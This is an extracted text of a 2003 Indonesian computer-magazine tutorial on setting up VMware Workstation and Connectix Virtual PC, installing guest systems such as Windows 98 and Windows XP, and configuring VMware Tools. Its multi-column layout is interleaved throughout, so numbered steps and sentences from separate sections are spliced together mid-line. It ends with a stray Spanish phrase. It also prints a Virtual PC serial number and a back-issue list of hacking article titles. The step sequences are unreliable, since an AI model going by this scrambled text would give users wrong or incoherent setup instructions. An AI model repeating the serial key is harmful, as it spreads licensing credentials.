pilihan-pilihan yang sudah Aanda seperti Windows 95/98, NT 4.0, dan
tentukan. Jika sudah benar klik Windows 2000.
tombol Done.
VMware merekomendasikan untuk Instalasi VMware Tools for Windows
menggunakan Configuration Wizard 1. Aktikan komputer virtual.
untuk membuat konfigurasi komputer 2. Konfigurasi ulang komputer vir-
virtual anda. Namun, anda juga dapat tual anda menggunakan VMWare
menggunakan Editor untuk pengguna- Tools floppy image. Pilih Settings
an lebih lanjut. → VMware Tools Install 17. Sesudah me-restart komputer vir-
tual Windows 98, buka device
Instalasi Sistem Operasi Guest 3. Klik ganda ikon My Computer di manager dan yakinkan display
Menginstal sebuah sistem operasi Desktop anda adapter yang anda gunakan adalah
guest di dalam komputer virtual pada 4. Klik ganda ikon drive A: VMware SVGA(FIFO).
dasarnya sama saja dengan saat anda 5. Klik ganda VMwareTools.exe dan
menginstal sistem operasi pada sebuah ikuti instruksi yang ditampilkan. Instalasi VMware Tools for Linux
komputer secara fisik. Instruksi untuk melakukan konfi- 1. Jalankan komputer virtual anda.
Untuk menginstal sistem operasi pada gurasi driver kartu VGA akan di- Berikut ini langkah-langkah yang
komputer virtual, ikuti langkah-langkah tampilkan secara otomatis di Note- harus Anda lakukan pada komputer
berikut: pad pada saat akhir proses instalasi. virtual, bukan di host komputer.
Jika window Notepad tersembunyi, 2. Pastikan komputer virtual anda siap
1. Masukkan CD-ROM instalasi atau klik tombol Notepad dari taskbar untuk diinstal VMware Tools.
floppy disk untuk sistem operasi Windows.
guest. Pilih Settings → VMware Tools
6. Setelah anda mengklik tombol Finish, Install
2. Aktifkan komputer virtual dengan akan ditampilkan window Display
mengklik tombol Power On. Jika anda tidak memutuskan untuk
Settings. tidak jadi menginstal VMware
3. Ikuti langkah-langkah instalasi 7. Klik tombol Advanced. Akan mun- Tools, anda dapat membatalkannya.
seperti biasa Anda menginstalasi cul dialog Standard Display Adapter Pilih Settings → Cancel VMware
sistem operasi lainnya. (VGA) Properties. Jika Anda meng- Tools Install.
Sistem operasi yang dapat Anda upgrade dari versi, dialog yang 3. Jika melanjutkan dan anda belum
instalasikan pada VMware muncul adalah VMware SVGA sebagai root, pada terminal ketikkan:
Workstation seperti: Properties. su
• Windows NT 4.0 8. Klik Adapter. 4. Lakukan mounting ke drive
• Windows 95 9. Klik tombol Change. Muncul dialog /dev/fd0 (merupakan virtual floppy
• Windows 98 Update Device Driver Wizard. Klik disk yang berisi file VMware Tools),
• Windows 2000 Next. copy-kan file tersebut ke direktori
• DOS / Windows 3.1 10. Dialog Wizard menampilkan dua /tmp, lalu unmount floppy.
• Caldera OpenLinux opsi. Pilih opsi Display a list of all
• Corel Linux OS cd /
drivers in a specific location... se- mount -t vfat /dev/fd0 /mnt
• Red Hat Linux lanjutnya klik tombol Next.
• SuSE Linux cp /mnt/vmware-linux-tools.tar.gz
• FreeBSD 11. Klik tombol Have Disk. Muncul /tmp
• Novell NetWare (masih dalam dialog Install From Disk. umount /dev/fd0
percobaan) 12. Selanjutnya pindah ke direktori ins- 5. Ekstrak file tar VMware Tools ke
talasi VGA untuk Win9x, klik OK: direktori /tmp kemudian instal.
Instalasi VMware Tools untuk A:\WIN9x cd /tmp
Sistem Operasi Guest 13. Pilih display adapter VMware tar zxf vmware-linux-tools.tar.gz
Menginstal aplikasi VMware Tools SVGA(FIFO) dan klik OK. cd vmware-linux-tools
akan sangat berguna bagi sistem ope- ./install.pl

Februari 2003 NeoTek 43


NeoTutor

6. Jalankan X bila anda berada di host and the virtual machine(s)


terminal text. and among virtual machines]
7. Jalankan VMware Tools background • Time synchronization between
application. the virtual machine and the host
vmware-toolbox & operating system [new feature in
Anda mungkin akan menjalankan this release]
VMware Tools background application 3. Pada Devices tab dapat anda tentu-
sebagai root atau sebuah user biasa. kan device mana yang akan diaktif-
Aplikasi tersebut akan menambahkan kan (enable) atau tidak (disable).
beberapa kemampuan lain pada saat
anda menjalankannya sebagai root.
Mengkonfigurasi VMware Tools
Uraian berikut ini mengemukakan peng-
gunaan sistem operasi guest Windows
98. Konfigurasi serupa dapat diterap-
kan pada sistem operasi guest lain.
5. Klik di mana saja pada jendela VM-
ware Workstation untuk melakukan
kontrol dari mouse dan keyboard.
6. Jika anda ingin login ke suatu net-
work, ketikkan nama dan password
seperti ketika anda login ke komputer.
4. Shrink tab dapat digunakan untuk Menjalankan Komputer Virtual
menentukan kembali space pada
drive anda.
Menjalankan VMware Workstation
Sekarang anda sudah menginstal VM-
ware Workstation, sebuah sistem ope-
1. Klik kanan ikon VMware Tools dari rasi guest, dan VMware Tools. Bagai-
system tray, kemudian klik Options mana menjalankan komputer virtual
.... (atau double-klik ikon VMware anda?
Tools dari system tray.) Sekadar gambaran, tuntunan berikut
diasumsikan bahwa Linux digunakan
sebagai host sistem operasi dan Win-
dows 98 merupakan sistem operasi
guest-nya. Beberapa perintah yang di-
gunakan dalam ilustrasi ini mungkin Catatan: Ketika VMware Tool
akan berbeda pada sistem operasi lain. Windows sedang dalam keadaan aktif,
Untuk menghidupkan atau mematikan akan terlihat ikonnya pada system tray
komputer virtual, anda hanya perlu anda (seperti gambar di atas)
menekan tombol Power On dan Power Menggunakan Mode Full Screen
Off saja.
Jika anda ingin VMware Workstation
• Komputer virtual menampilkan komputer virtual Anda
dalam keadaan dalam format layar penuh (full screen)
off (atas) dan on
(bawah).
—tentu saja border VMware Workstat-
ion tidak akan terlihat lagi—klik tom-
2. Opsi VMware Toolbox antara lain: bol Full Screen dari tool bar.
• Release input focus when the Untuk keluar dari mode full screen—
mouse leaves the virtual machine menampilkan komputer virtual ada di
• Capture input focus when the layar VMware Workstation—tekan
mouse enters the virtual machine Memulai Komputer Virtual tombol kombinasi Ctrl+Alt+Esc secara
• Scroll when mouse nears edge of bersamaan.
the virtual machine 1. Buka sebuah terminal, ketikkan
• Hide Cursor when the virtual vmware dan tekan Enter. Instalasi Software Aplikasi pada
machine loses input focus 2. Pilih radio button Open an existing Komputer Virtual
• Bring the virtual machine to the configuration, kemudian klik OK. Instalasi software aplikasi pada kom-
top when it gets input focus 3. Browse ke komputer virtual direk- puter virtual dapat anda lakukan layak-
Sedangkan opsi Miscellaneous adalah: tori. Sorot file win98.cfg, klik OK. nya menginstal software tersebut pada
komputer biasa.
• Allow copy and paste to and from 4. Klik tombol Power On untuk mulai
the virtual machine [between the menjalankan komputer virtual 1. Yakinkan anda sudah menjalankan
anda. komputer virtual dan jika perlu,

44 NeoTek Februari 2003


NeoTutor

anda login. Pada Device tab pastikan 2. Pilih Configuration Editor dari Shut Down Komputer Virtual
pula komputer virtual Anda dapat menu Settings.
1. Pilih Shut Down dari menu Start
mengakses CD-ROM dan floppy +) di bagian IDE
3. Klik tanda plus (+ sistem operasi guest (Windows 98).
disk. Drives untuk melihat subdirektori
2. Masukkan CD atau floppy Instalasi di bawahnya, kemudian klik drive
ke drive yang bersangkutan. Jika primary (P-M = Primary Master)
anda menginstal melalui CD-ROM untuk memilih drive tersebut.
program mungkin akan dijalankan 4. Pilih opsi yang sesuai untuk mode
secara otomatis. disk Persistent, Nonpersistent, atau
3. Jika program instalasi tidak secara Undoable, klik Save untuk melaku-
otomatis dijalankan, di Windows, kan perubahan dan tutup Configur-
klik tombol Start → Settings → ation Editor.
Control Panel, klik ganda Add/
Remove Programs dan klik tombol Menggunakan Suspend dan
Install. Ikuti langkah-langkah yang Instant Restore
diberikan software tersebut selama Suspend pada komputer virtual:
proses instalasi.
1. Jika komputer virtual anda sedang
Cutting dan pasting aktif dalam mode full-screen, kem-
balikan ke window mode dengan 2. Pilih tombol radio Shut Down, klik
SaatVMware menekan tombol kombinasi OK.
Tools sedang Ctrl+Alt+Esc secara bersamaan.
dalam ke- 3. Untuk keluar dari aplikasi VMware
adaan jalan, anda dapat melakukan 2. Klik tab Suspend pada tombol Workstation, sebaiknya sistem
copy dan paste di antara aplikasi-apli- VMware Workstation. operasi guest yang aktif Anda shut
kasi, baik pada komputer virtual mau- down terlebih dahulu.
pun host komputer, bahkan antara dua Jika anda menggunakan sistem operasi
atau lebih komputer virtual. guest yang berbeda, prosedurnya
menjalankannya sama saja.
Menggunakan mode disk
VMware Workstation dapat menggu-
nakan tiga perbedaan mode disk, yaitu Ketinggalan Membaca
persistent, nonpersistent, dan undoable. NeoTek?
Persistent disks berlaku persis seperti Edisi lama: harga khusus &
disk drive biasa pada sebuah komputer.
Penulisan ke sebuah persistent disk bebas ongkos kirim
ditulis secara permanen ke dalam disk. Baru tahu ada majalah NeoTek?
Penulisan menggunakan mode non- Penawaran khusus edisi lama NeoTek
persistent akan menghilangkan data 3. Untuk keluar dari VMware Rp15.000,-/eks (dengan CD)
yang dituliskan pada saat anda mema- Workstation. Rp8000,-/eks (tanpa CD)
tikan komputer virtual. Pada mode Pilih menu File → Exit Rp10.000,-/eks (CD saja)
undoable, aAnda mempunyai opsi
apakah anda akan membiarkan data Mengembalikan komputer virtual dari Hubungi: Elvy Risma Nainggolan
anda atau tidak selama anda bekerja. status suspended: (redaksi@neotek.co.id)
Sebelum anda putuskan memilih salah Telp. 021-5481457
1. Memulai VMware Workstation dan
satunya, data akan tersimpan pada pilih komputer virtual yang sedang Ada apa saja di edisi lama NeoTek?
pada sebuah file redo-log. II/1 Oktober 2001
dalam posisi suspended. Proses di Hacking dengan Back Orifice
atas gambarannya sama ketika II/2 November 2001
Anda memulai komputer virtual Dasar-dasar Remote Hacking
seperti sebelumnya II/3 Desember 2001
Footprinting: Intelijen Awal
2. Klik Resume pada bar tombol II/4 Januari 2002
VMware Workstation. Software Cracking
II/5 Februari 2002
Meng-hack NT Server
II/6 Maret 2002
SoftICE: Serial Fishing
II/7 April 2002
Mengintip Password dengan Dsniff
II/8 Mei 2002
Superscan: Scanning Tool setara Nmap
II/9 Juni 2002
Anda dapat menggunakan konfigurasi Skrip mIRC & EggDrop
II/10 Juli 2002
editor untuk mengubah mode disk Legion: Jalan-jalan ke Komputer Orang
untuk komputer virtual anda. II/11 Agustus 2002
1. Ikuti Langkah 1 dan 2 pada Starting Hacking & PC Securit; Virus & Trojan
II/12 September 2002
a Virtual Machine, tetapi jangan Password Cracking: Seni & Tekniknya
klik tombol Power On sebelumnya.

Februari 2003 NeoTek 45


NeoTutor

CONNECTIX VIRTUAL PC
onnectix Virtual PC for Windows
C dapat diinstal pada berbagai versi
Windows. Pada contoh ini, Virtual
PC akan diinstal pada Windows ME.

INSTALASI MESIN MAYA Selanjutnya guest OS yang akan diinstal


adalah Windows XP Professional Edition.
Dengan Connectix Virtual PC, anda dapat

PADA WINDOWS ME bereksperimen dengan berbagai macam


sistem operasi serta berbagai macam distro
Linux, langsung pada Windows ME anda,
tanpa harus takut partisi komputer anda
Connectix Virtual PC pada awalnya tersedia untuk Mac menjadi berantakan.
agar dapat menjalankan Windows. Namun kini Virtual PC Selain itu, bila memasang sistem operasi
tersedia pada platform Windows, Mac, dan OS/2 untuk guest yang sama dengan sistem operasi host,
anda pada dasarnya menciptakan suatu
menjalankan mesin maya dari pelbagai platform, termasuk virtual sandbox, suatu lingkungan terpisah
Linux, Solaris, dan BSD. untuk menginstal berbagai program yang

Menyiapkan hard disk image untuk guest OS pada host OS.

MEMULAI INSTALASI PILIHAN BAHASA INSTALL SHIELD WIZARD


1 Jalankan Virtual PC yang ada pada
CD NeoTek bulan ini dengan klik
2 Ada banyak bahasa yang dapat di-
pilih dalam melakukan setup. Kita
3 Kita akan menjalankan InstallShiled
Wizard yang akan sangat memu-
dua kali ikonnya. File-file secara pilih saja salah satunya. Dalam hal dahkan kita melakukan setup. Klik
default akan disimpan di sub- ini English (United States) dan Next yang akan menampilkan End
direktori Connectix dibawah direk- klik OK untuk memulai setup. User Licence Agreement. Pilih
tori C:\ProgramFiles (dapat diubah). I accept... dan klik Next.
Selanjutnya akan muncul jendela
untuk mulai men-setup Virtual PC

ADA DI MENU BAR PC SETUP WIZARD PC NAME


7 Setelah restart, Connectix Virtual
PC kini telah terdapat pada menu
8 Akan tampil jendela kecil Virtual
PC dengan tombol pertama New
9 Selanjutnya anda diminta mem-
beri nama pada virtual PC yang
bar. Pilih menu itu yang akan me- PC. Karena belum pernah ada akan anda instal. Pada contoh ini
nampilkan jendela kecil yang guest OS yang diinstal, maka diberi nama Virtual Windows XP.
memberi opsi apakah akan mem- secara otomatis New PC ini yang Tapi anda dapat saja memberi
beli (Buy Now) dengan indikasi dipilih dan akan menampilkan nama lain, seperti mungkin nama
berapa lama lagi akan expire. Klik jendela PC Setup Wizard. Klik pemakainya. Klik Next untuk
OK untuk melanjutkan. Next untuk melanjutkan. melanjutkan.

46 NeoTek Februari 2003


NeoTutor

mungkin berbahaya seperti Trojan horse,


bereksperimen dengan berbagai macam
virus dan worm generator, exploit,
serta hasil download dari Internet yang
tidak jelas faktor risikonya.
Berbeda dengan VMWare yang meng-
gunakan beberapa driver bawaannya
sendiri dan terkadang tidak menggu-
nakan driver asli dari hardware-nya,
maka Connectix Virtual PC membaca
nyaris segala macam driver yang ter-
sedia sehingga virtual machine yang
terbentuk sangat mirip dengan mesin
riil, yang seolah-olah guest OS dipa-
• Layar pembuka
sang langsung pada hardware yang
instalasi Connectix
bersangkutan.
Virtual PC 5.1 for
Windows.

SERIAL NUMBER BAHASA DAN OPSI SETUP INSTALASI SAMPAI SELESAI


4 Anda akan diminta memasukkan
User Name dan Organization. Isi
5 Virtual PC dapat di-setup agar
menggunakan pelbagai bahasa.
6 Program akan diinstal pada di-
rektori yang sama yaitu sub-
saja sesuai keinginan anda. Untuk Pilih saja English dan pada setup direktori Connectix di bawah
hasil download yang ada di CD type ada pilihan Complete atau direktori C:\ProgramFiles (dapat
NeoTek ini, serial numbernya adalah Custom. Untuk pertama kali ini, diubah). Selesai instalasi, anda
VPT5-6127-4803-8483-3427 kita pilih Complete. perlu me-restart komputer anda.

KONFIGURASI VIRTUAL PC ALOKASI RAM & HD IMAGE GUEST OS TERINSTAL


10 Virtual PC default dapat diben-
tuk untuk kemudian diedit se-
11 Akan tampil informasi mengenai
RAM yang dialokasikan untuk vir-
12 Lokasi dan nama hard disk image
adalah C:\MyDocuments\Virtual
cara manual, namun untuk mu- tual PC ini dan dapat anda ubah Windows XP.vhd (dapat diubah).
dahnya pilih opsi Guide Me dan dengan menggeser slide bar. Pada Ikuti saja sampai selesai. Akan
klik Next. Akan tampil guest OS contoh dari alokasi RAM 64 Mbyte tampil Setup Summary dan kini
apa yang akan diinstal. Dalam kita ubah ke 128 Mbyte (host-nya pada jendela kecil Virtual PC
hal ini pilih Windows XP. 256 Mbyte). Selanjutnya pilih sudah terdapat guest OS yang
membuat hard disk image baru. belum dijalankan.

Februari 2003 NeoTek 47


NeoTutor

CONNECTIX VIRTUAL PC
ard disk image yang dibentuk
H merupakan hard disk kosong yang
padanya dapat diinstalkan sistem
operasi yang diinginkan. Untuk itu mesin

INSTALASI GUEST OS maya harus di-boot dengan installer CD


(atau installer diskette) terpasang.
Selanjutnya instalasi akan berjalan seperti

PADA MESIN MAYA layaknya menginstal sistem operasi yang


bersangkutan pada mesin sungguhan.
Driver-driver yang penting seperti untuk
setting resolusi layar dan sound card dike-
Mesin maya yang dibentuk pada dasarnya menyiapkan nali dengan baik oleh Virtual PC.
image untuk guest OS. Untuk menginstal guest OS itu Apabila mesin maya ini berada dalam
sendiri kita harus menjalankan mesin maya itu dengan CD suatu network, maka mesin ini akan dike-
nali sebagai mesin sendiri dan mendapat-
Installer (atau diskette installer) yang terpasang, yang akan kan IP Address sendiri pula.
mem-boot mesin maya tersebut dengan guest OS.

Instalasi sistem operasi tamu di bawah sistem operasi tuan rumah.

MENGHIDUPKAN MESIN MAYA BOOT WINDOWS XP CD PARTISI YANG TERSEDIA


1 Dengan Windows XP Installer CD
terpasang pada CD drive, double
2 Tekan sembarang tombol keyboard
untuk mem-boot mesin maya ini
3 Mengikuti setelan yang telah kita la-
kukan sebelumnya terhadap mesin
click pada jendela yang menggam- dari CD. Anda akan mendapatkan maya, akan ditunjukkan bahwa
barkan virtual hardware yang akan jendela Windows XP Professional mesin maya ini mempunyai hard
membuat virtual hardware itu di- Setup. Tekan Enter dan anda akan disk image sebesar 16,3 Mbyte
boot seperti layaknya hardware masuk ke End User Licence Agree- dengan format partisi FAT32. Kita
sungguhan yang akan memeriksa ment-nya Microsoft. Tekan F8 bisa mengubah partisi ini menjadi
RAM sebelum boot dari CD. untuk menyetujuinya. NTFS bila diinginkan.

PRODUCT KEY SAMPAI ADMIN SETUP NETWORK SETUP NETWORK CARD


7 Selanjutnya masukkan product
key Windows XP yang akan dilan-
8 Dalam proses instalasi ini,
Windows XP Installer akan men-
9 Windows XP Installer akan me-
ngenali network card yang ada
jutkan dengan mengisi Computer setup network anda juga. Ada dan menginstal protokol-protokol
Name dan administrator pass- dua pilihan: Typical settings dan yang diperlukan. Pada contoh ini
word. Custom settings. pilih Custom LAN-nya berupa peer-to-peer
settings dan klik Next untuk networking dengan workgroup
melanjutkan. NEOTEK yang artinya tidak
menggunakan domain name.

48 NeoTek Februari 2003


NeoTutor

Berbeda dengan VMWare yang me-


netapkan virtual network adapter,
mesin maya di bawah Virtual PC
akan menggunakan network adapter
yang sama dengan tuan rumahnya
(shared network adapter dan bukan
bridged network adapter).
• Pada Virtual PC
Secara keseluruhan instalasi mesin
dengan nama Virtual
maya pada Virtual PC sama mudahnya
Windows XP ini
(kalau tidak lebih mudah) dibanding-
belum terpasang OS
kan VMWare.
apapun. Yang
Hanya saja, walaupun dapat meng- terbentuk hanyalah
instal guest OS Linux, Solaris, serta mesin maya (setara
BSD, Virtual PC tidak tersedia pada hardware) yang dapat
platform Linux. Hanya tersedia pada dilihat spesifikasinya
Windows, Mac, dan OS/2. dengan menekan
tombol “Settings...”

INSTALASI SAMPAI BOOT INSTALASI WINDOWS XP CUSTOMIZE SETTING


4 File-file yang diperlukan akan di-
copy ke hard disk image tadi
5 Setelah tampil menu pembuka
Windows XP yang khas itu, instal-
6 Pada jendela Setting, anda bisa
menekan tombol Customize
sebelum akhirnya komputer akan asi Windows XP akan diteruskan untuk mengubah setelah format
di-boot ulang. Kali ini akan di- dengan tampilan grafis. tanggal, digit, mata uang, serta
boot dari hard disk maya yang lokasi geografis.
sudah diisi file-file Windows XP.

RESOLUSI LAYAR RESTART DAN USER LOG IN VIRTUAL XP PADA LAN


10 Setelah instalasi selesai, akan
tampil pesan bahwa Windows
11 Instalasi selesai dan Windows XP
akan restart dengan penampilan
12 Kini anda dapat menjalankan vir-
tual XP ini seperti layaknya kom-
akan mengubah resolusi layar khasnya. Pilih user untuk log in puter sungguhan. Di sini tampak
agar dihasilkan penampilan dan Windows XP akan menerap- browse ke situs NeoTek dan tam-
terbaik. Klik OK dan akan tampil kan personal setting pada sesi pilan network neighborhood, baik
pesan yang menanyakan apakah Windows XP virtual ini. pada virtual XP maupun pada real
suatu teks dapat terbaca. Bila ME. Tampak ada lima komputer
ya, klik OK untuk melanjutkan. yang satu di antaranya virtual.

También podría gustarte